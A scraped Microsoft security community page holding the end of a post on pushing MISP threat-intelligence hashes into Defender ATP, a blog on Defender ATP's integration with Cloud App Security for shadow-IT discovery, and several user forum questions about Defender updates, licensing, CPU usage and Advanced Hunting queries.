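Run it as .\Push-MispSha1.ps1 -mispUrl "10.0.0.1" -authKey "Yn81mP1ck13Ric4" -action AlertAndBlock -severity High. Scheduling it with a lookback longer than the run interval (for example every day with the default 4d) is what keeps the indicator set current: each run re-submits hashes that are still in MISP, which pushes their expiration forward, while hashes that have left the export age out after -expiration days.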
Important note: If the hash you are submitting already exists in Microsoft Defender ATP with a different expiration date or severity etc., it's OK - it will be updated with the new value. However, if it already exists with a different "action" field value (Alert, AlertAndBlock or Allow), it will not be updated (or submitted), and the script will print the hash with the corresponding message - this is by design.

Please share your thoughts and feedback here. Thanks,
@Itai Zur, program manager, Windows Defender ATP
@Thorsten Henking, senior program manager
@Dan Michelson, program manager, Windows Defender ATP
@Haim Goldshtein, security software engineer, Windows Defender ATP
31K Views | 5 likes | 6 Comments

MDATP & Cloud App Security Integration
Native support for the discovery of Shadow IT: one-click integration of Microsoft Cloud App Security with MDATP

Overview

At RSA, the world's largest cybersecurity conference, we announced the general availability of Microsoft Defender ATP's integration with Microsoft Cloud App Security, delivering a native integration to discover the cloud apps used in your organization. This is the first step towards enabling a seamless, zero deployment, native cloud app security solution that works any time, anywhere. Read below to learn why we do it, how to enable it with a single click, what the new value and experience are, and how we're going to continue to enhance these capabilities in the future. Even if you are already using Microsoft Cloud App Security to monitor Shadow IT, the new integration provides additional value to the Discovery data.

Key Benefits

The short answer is "you get more for less". 4 main advantages:
- Agent-less cloud app discovery
- Discovery beyond the corporate network
- Machine-based investigation
- Single-click enablement
As a native OS component, we strive to continuously add value for customers via the

Supported operating systems
Windows 10 1903 or later; 1809 (KB 4482887); 1803 (KB 4489894); 1709 (KB 4489890)

Enabling the new integration

If you have Microsoft Cloud App Security up and running in the same tenant as MDATP, it's down to a single click: go to the Advanced Settings in the Windows Defender Security Center and enable the Microsoft Cloud App Security integration. And you're done. Microsoft Defender ATP will start sending the relevant log data to Microsoft Cloud App Security. If you're not using Microsoft Cloud App Security yet, start a trial to test this integration.
Image 1: 1-click enablement

Note! After enabling the integration, it takes some time for the data collection to kick off and for data transit and processing to start.
It will take a few minutes for the connected endpoints to start collecting and sending the desired telemetry, and then up to 4 hours to process the first batches and build the report.

Deep insights into your organization’s cloud app usage

Once you’ve enabled the integration, navigate to the Cloud Discovery dashboard from the navigation pane in the Microsoft Cloud App Security portal. Once you select the Win10 endpoint users report from the list of continuous reports, a new “Machines” tab is added to the dashboard.

Image 2: Cloud Discovery – Discovered apps view

Typical use cases

Discovery

With the Discovery capabilities in Microsoft Cloud App Security you get new insights into the existing cloud use in your organization and tools to evaluate risks and start governing existing Shadow IT. Image 1 depicts the typical lifecycle of managing the discovered apps in your organization.

Image 3: Shadow IT management lifecycle

The new machine view

By integrating with Microsoft Defender ATP, an additional Machines tab is added to the dashboard. This provides all the information on a machine basis, rather than on a user basis. This allows you to analyze the findings on a machine basis to get granular insights into the apps accessed from specific machines. In addition, all the data now also includes information on cloud apps that were accessed outside of the corporate network.

Image 4: Machine-based investigation in MCAS portal

Continue your investigation in Microsoft Defender ATP

If you find anything suspicious, such as a user having uploaded unusually high amounts of data to a risky app, you may want to continue your investigation in Microsoft Defender ATP and ensure that the machine is not compromised. A single click (on the upper-right Microsoft Defender ATP link) will shift to the verbose machine page of MDATP. There, in the machine timeline, you can investigate the root cause down to the process level and, if needed, even to the ancestor processes, download origins, etc.
What’s next

This native integration is another step towards creating a set of comprehensive, natively integrated security solutions across Microsoft 365. Building this endpoint-based CASB scenario to play together in a seamless experience is a strategic decision to simplify your security and compliance processes. Based on your feedback during our public preview, we backported this capability set to Windows 10 1709 to make it more broadly applicable. Update your clients to have it. The updated clients will then also be able to feed telemetry to Microsoft Cloud App Security. In addition, we will continue to enhance the existing integration with additional capabilities:
- Seamless enforcement of Microsoft Cloud App Security policies, such as the blocking of unsanctioned cloud apps
- Enforcement statistics of policies sent from Microsoft Cloud App Security to the Microsoft Defender ATP agent
- Support for non-Windows endpoints

More resources and feedback
- Get started with a Microsoft Cloud App Security trial today
- Check out this e-book to learn more about the integration between Microsoft Defender ATP and Microsoft Cloud App Security
- Learn more about Microsoft Cloud App Security
- Technical documentation to get started
- Microsoft Cloud App Security licensing information

As always, we’d love to hear your feedback. Please share your thoughts and feature suggestions!

Microsoft Defender ATP & Microsoft Cloud App Security Teams

Can't update Defender app on macOS
Hello,

We started getting this situation where Defender for macOS can't be updated:

Microsoft Defender 101.25072
Current Version: 101.25062
Installed: 2025-08-05
Update error: The update could not be installed at this time. Please try again later.
Microsoft AutoUpdate is up to date.
Operating System Version: 15.6.1

Device managed by Mosyle MDM. All of our active users have been updated to 15.6.1 (and this problem was observed on OS versions from 15.1 to 15.6.1). What could be causing this? And what can we do about it?

Defender GitHub documentation now in private repos
Forced to pick a category, so it's in Endpoint since that's one of the biggest areas affected: I've noticed that all Defender documentation within Microsoft-Docs public repositories has now been stripped and moved to "defender-docs-pr" - a private repository on GitHub. Anyone have any insight on the rationale behind this? Seems like a step backwards by hiding it all away.

More recent commit history showing all the removal of content from public docs repo - https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security

New private docs repo (this will 404 for most people) - https://github.com/MicrosoftDocs/defender-docs-pr

Very disappointing change, as this will have walled away what was previously seen as a very collaborative platform for directly suggesting updates / fixes to documentation. I realise this may be in line with moving of feedback channels away from GitHub, but to now also lose visibility, rationale, history of the updates themselves from public view is a huge boon.

Web content filtering and indicator aren't working on third party browser
Hi, we have just noticed that web content filtering and customized indicators are not working on third party browsers after upgrading Defender for Endpoint to 4.18.23050.3; the issue has happened on both Win10 and Win11 machines. Has anyone else got the same issue?

Defender for Endpoint Server standalone license
As of September 1, Microsoft has removed the Defender for Endpoint on Servers P1 and P2 licenses, forcing on-premises customers to use Azure Arc / Defender for Cloud! Onboarding to Azure Arc is not always possible, another agent is required and it requires a huge effort for the management of the subscription, security and assets. Microsoft will lose EDR customers... This will also show up in the client licenses of Defender for Endpoint. If Microsoft does not want on-premises server customers in their EDR solutions, the customers will not go with two EDR solutions but leave Microsoft and choose another EDR / XDR solution for server AND clients. How does Microsoft imagine it if different MSPs provide services for the customer and on-premises and Azure are strictly separated? Should the Azure partner then have access to the on-premises systems? That won't happen. Another bad decision for customers, partners and lastly for Microsoft. Please revert your decision and make the Defender for Endpoint Server P2 License available again through CSP, EA and Direct.

MsSenseS.exe high CPU usage
Good Afternoon - We have a few servers in Azure that have extremely high CPU usage due to the "MsSenseS.exe" process. Is there anything that can be done to alleviate this? Seems like this process is related to Defender or some sort of Microsoft sensor. I have opened a ticket with Microsoft Support, which has not been that helpful.

Advanced Hunting for SmartScreen events
Recently I've been working on some Advanced Hunting queries for Web Content Filtering. This data is easy to find for third party browsers such as Chrome or Firefox, assuming Network Protection is turned on. Simply query DeviceEvents | where ActionType == 'ExploitGuardNetworkProtectionBlocked'. However, Edge does not use Network Protection to block sites based on Web Content Filtering. It utilizes SmartScreen. As such, I would expect that these events would be under the 'SmartScreenUrlWarning' ActionType. However, this doesn't return any data. In fact, I've found that none of the SmartScreen related ActionTypes return any data. I've confirmed that SmartScreen is enabled and functional with the tools on demo.wd.com. Has anyone been able to successfully query SmartScreen data through Advanced Hunting?
Recent Blogs
- As of today, October 14, 2025, Microsoft is officially ending support for Windows 10. This means that Windows 10 devices will no longer receive security or feature updates, nor technical support from... (Oct 14, 2025)
- We’re excited to announce a key milestone in Defender’s multi-tenant management journey—Microsoft Defender for Endpoint security policies can now be distributed across multiple tenants from the Defen... (Aug 07, 2025)